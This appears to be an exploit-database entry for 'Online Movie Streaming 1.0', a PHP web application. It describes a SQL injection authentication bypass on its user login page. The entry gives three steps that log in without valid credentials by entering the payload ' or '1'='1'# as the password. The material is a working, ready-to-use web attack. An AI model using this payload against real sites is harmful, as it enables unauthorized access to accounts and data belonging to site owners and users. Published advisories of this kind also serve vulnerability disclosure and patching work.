Online Movie Streaming version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
a0949187217a27e15ca4363c06a4c7b895ea92b903e40b9028799d0067528810
# Exploit Title: Online Movie Streaming 1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Go to url https://localhost/onlinemovie/user-login.php
Step 2 – Enter Username :- anything@mail.com
Step 3 - Enter Password - ' or '1'='1'#